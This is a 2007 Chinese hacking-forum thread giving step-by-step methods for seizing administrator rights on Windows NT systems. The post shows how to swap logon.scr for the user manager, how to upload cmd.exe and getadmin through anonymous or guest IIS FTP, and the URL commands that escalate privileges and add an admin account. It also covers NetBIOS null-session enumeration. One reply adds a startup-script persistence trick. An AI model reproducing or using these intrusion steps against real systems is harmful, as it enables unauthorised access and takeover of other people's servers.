Board logo

标题: [讨论] Administrastor真不安全 [打印本页]
作者: 花无缺    时间: 2007-5-22 10:23     标题: Administrastor真不安全

 之一

如果你有普通用户帐号,有个一个很简单的方法获取NT Administrator帐号:

先把c:\winnt\system32下的logon.scr改名为logon.old备份

然后把usrmgr.exe改名为logon.scr

然后重新启动

logon.scr是启动时加载的程序,重新启动后,不会出现以往的登陆密码输入界面,而是用户管理器这时他就有权限把自己加到Administrator组,不要忘记把文件名改回来啊!


    之二:

下面的技术适用于不重视NT网络安全的网站,一些 http的技术也可以供较高级的人员参考进入NT网络可以采取下面的步骤:

因为NT的IIS server的ftp一般都是允许anonymous匿名帐号进入的,有些anonymous的帐号还有upload权限,我们就要攻击这类站点。因为如果不允许匿名帐号,就可能造成明文密码在网上传输。用tcpspy的工具可以截获这些密码。现在不谈这些比较高级的技术。

正因为允许匿名帐号ftp登陆的设定,也给我们带来了突破NT server的机会。我们用ftp登陆一个NT server,比如:www.xxx.com(示例名):

ftp www.xxx.com

Connected to www.xxx.com

220 ntsvr2 Microsoft FTP Service (Version 3.0).

ntsvr2这个东西暴露了其NETbios名,那么在IIS的背景下,必然会有一个IUSER_ntsvr2的用户帐号,属于Domain user组,这个帐号我们以后要用来获取Administrator的权限

User (www.xxx.com:(none)):anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 输入 guest@ 或者guest
对于缺乏网络安全知识的管理员来说,很多人没有将guest帐号禁止,或者没有设置密码。那么guest帐号就是一个可用的正确的用户帐号,虽然只属于Domain guest组,在这种情况下我们就可以进NT server的ftp了。

进去以后,看看目录列表,试试 cd /c 或wwwroot等关键目录,如果运气好,改变目录成功,这时你就有了80%的把握。

现在,开始查找cgi-bin目录(或者scripts目录),进去以后,

把winnt下的cmd.execopy到cgi-bin,把getadmin和gasys.dll传上去到cgi-bin

然后输入:http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_SATURN

大约十多秒后屏幕显示:

CGI Error

这时有90%的可能是:你已经把IUSER_ntsvr2升级为Administrator,也就是任何访问该web站的人都是管理员,下面可以add user:

http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20china%20news%20/add

这样就创建了一个叫china用户,密码是news,然后:

http://www.xxx.com/cgi-bin/getadmin.exe?china
或者

http://www.xxx.com/scripts/tools/getadmin.exe?china
你再用china的帐号登陆,就可以有最大的权限了,也可以用上面的cmd.exe的方法直接修改如果没有cmd.exe,也可以自己传一个上去到scripts/tools或者cgi-bin目录

   之三:

用NT的Netbios技术扫描

nbtstat -a http://www.xxx.com/

或者

nbtstat -A http://www.xxx.com/

这样可以得到其域的共享资源名称

net view file://www.xxx.com/

可以获得其机器的共享资源名称,如果有c盘

net use f: file://www.xxx.com/c

可以用f:映射其c盘

net use \\111.111.111.111\ipc$ "" /user:""


   之四: Unix下移植过来的工具:

Windows95&98的用户可以用这个tcp/ip工具去抓tcp/ip连接中的包:

WinDump95.exe 使用前还要下载这个库 Packet95.exe

WindowsNT用户的版本

WinDump.exe PacketNT.exe

本文摘自frankie的文章,同时修改加入了本人的一些观点.

[ 本帖最后由 花无缺 于 2007-5-28 09:46 编辑 ]
作者: 七龙    时间: 2007-5-22 12:18

顶上去下午详细看看哈哈
作者: 黑色叶子    时间: 2007-5-22 20:52

之一
当NTFS格式只有administrators组有权限的时候是不可以更改任何C盘东西的
之二
需要执行权限,现在几乎没人开这个权限了
作者: stylehack    时间: 2007-5-22 20:58

作者: talkerznj    时间: 2007-5-23 20:42     标题: 好啊

不错啊,长长见识了
作者: pg_p    时间: 2007-5-23 21:53

讲的很详细的,辛苦了
作者: voxadd    时间: 2007-6-23 01:18

我掌握着公司电脑管理员密码,这怎么防止修改呢?
作者: 售梦幻木马    时间: 2007-7-17 14:45

字多 看了眼花 我说下我的方法和这差不多 不知道楼主说这方法了没
写好批处理 进组策略(gpedit.msc) windows设置 脚本 双击启动 添加上写的批处理 重启 就可以了
作者: sa.thysea$    时间: 2007-9-10 01:06

恩 ...感觉还是叶子细心点...
作者: ◆◆◆◆◆◆    时间: 2007-9-12 10:22

上面的那家伙是个禽兽@@
作者: 张颂    时间: 2007-9-18 21:46     标题: 学习

学习中。。。
作者: 寂寞残骸    时间: 2007-10-13 13:19

都是高手



欢迎光临 黑色海岸线论坛 (http://bbs.thysea.com/) Powered by Discuz! 7.2